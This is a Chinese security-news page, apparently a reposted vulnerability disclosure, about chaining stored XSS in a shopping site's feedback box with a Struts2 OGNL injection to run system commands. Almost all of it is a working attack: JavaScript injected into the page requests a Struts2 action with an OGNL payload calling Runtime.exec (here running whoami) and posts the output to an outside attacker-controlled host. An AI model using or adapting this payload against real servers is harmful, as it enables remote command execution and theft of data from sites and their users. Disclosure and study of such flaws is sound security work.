频道栏目
首页 > 资讯 > 网站安全 > 正文

走秀网利用XSS+STRUCT2任意执行命令

14-09-19        来源:[db:作者]  
收藏   我要投稿

 

QQ截图20140913190935.jpg

在吐槽处插入XSS代码

function up_data(data)
{
var up_result;
var data=encodeURIComponent(data);
var mlhttp=new XMLHttpRequest();

mlhttp.onreadystatechange=function()
{
if(mlhttp.readyState==4)
{
up_result=mlhttp.responseText;
}
}
mlhttp.open("POST","http://www.memeda.pw/g.php",true);
mlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
mlhttp.send("data="+data);

}

function get_web_by_get(url){
var lhttp=new XMLHttpRequest();
var get_result;
lhttp.onreadystatechange=function()
{if(lhttp.readyState==4)
{
get_result=lhttp.responseText;
}
}
lhttp.open("GET",url,false)
lhttp.send();
return get_result;
}

var sdata=get_web_by_get("/toViewFeedBack.action?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\\43webRootzpro\\75@java.lang.Runtime@getRuntime().exec(\\43req.getParameter(%22cmd%22))')(d))&(i)(('\\43webRootzproreader\\75new\\40java.io.DataInputStream(\\43webRootzpro.getInputStream())')(d))&(i01)(('\\43webStr\\75new\\40byte[51020]')(d))&(i1)(('\\43webRootzproreader.readFully(\\43webStr)')(d))&(i111)(('\\43webStr12\\75new\\40java.lang.String(\\43webStr)')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43webStr12)')(d))&(i99)(('\\43xman.getWriter().close()')(d))&cmd=whoami");
up_data(sdata);

 

相关TAG标签
上一篇:UC浏览器(PC版)任意网站伪造漏洞
下一篇:2345论坛过滤不严可任意编辑他人帖子
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站